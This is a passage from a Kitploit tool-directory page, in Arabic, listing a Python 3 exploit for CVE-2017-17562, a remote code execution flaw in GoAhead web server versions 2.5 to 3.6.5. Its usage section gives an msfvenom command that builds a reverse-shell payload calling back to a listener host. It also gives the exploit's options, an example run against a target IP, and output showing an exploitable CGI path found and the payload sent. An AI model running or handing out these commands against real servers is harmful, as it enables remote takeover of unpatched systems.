Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2017-17562 — استغلال مستقل بلغة Python 3 لـ CVE-2017-17562 | Kitploit
أدوات/GitHubGitHub/ivanitlearning/cve-2017-17562
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقأداة الوصول عن بعدتطوير الحمولات
GitHubivanitlearning/cve-2017-17562

CVE-2017-17562

استغلال مستقل بلغة Python 3 لـ CVE-2017-17562

عرض المستودع
104منذ 6 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2017-17562 ثغرة RCE في خادم ويب GoAhead 2.5 < 3.6.5

أداة استغلال مستقلة بلغة Python 3 لشل عكسية لـ CVE-2017-17562، تعمل على خادم ويب GoAhead الإصدارات 2.5 < 3.6.5.

المقالة هنا.

مكتوب ومختبر على Python 3.7 بناءً على POC وبيئة ضعيفة هنا. تم اقتباس بعض الكود من وحدة Metasploit.

POC الأصلي موجود هنا. كتبت هذه الأداة لأنني لم أتمكن من جعل استغلال POC الأصلي يعمل، وأدركت فقط أنه يفتقر إلى وظيفة للبحث عن وحدة CGI لاستغلالها، أي أنه يتطلب من المستخدم تحديد موقعها أو تقديم قائمة كلمات للبحث المتكرر.

الاستخدام

root@kitploit:~
root@Kali:~/Infosec/RubyStuff/GoAhead-Web-Server-2.5~3.6.5# ./exploit.py -h
usage: exploit.py [-h] -rhost RHOST [-rport RPORT] [-cgipath CGIPATH] -payload
                  PAYLOAD

Generate the payload first, eg: 
msfvenom -a x64 --platform Linux -p linux/x64/shell_reverse_tcp LHOST=192.168.92.134 LPORT=4444 -f elf-so -o dir/payload.so

Required arguments:
  -rhost RHOST      Target host running Go Ahead webserver eg. 192.168.92.153
  -payload PAYLOAD  Path to the malicious elf-so payload. eg dir/payload.so

Optional arguments:
  -rport RPORT      Target port running GoAhead webserver. Default: 8080
  -cgipath CGIPATH  The path to a CGI script on the GoAhead server Default: '/cgi-bin' as in http://192.168.92.153/cgi-bin

Call the exploit like this: 
./exploit.py -rhost 192.168.92.153 -rport 8080 -cgipath /cgi-bin/index -payload dir/payload.so
root@Kali:~/Infosec/RubyStuff/GoAhead-Web-Server-2.5~3.6.5# ./exploit.py -rhost 192.168.92.153 -rport 8080 -payload payload3.so 
Searching 390 paths for an exploitable CGI endpoint...
Exploitable CGI located at /cgi-bin/index
Sending payload...
تنزيل الأداة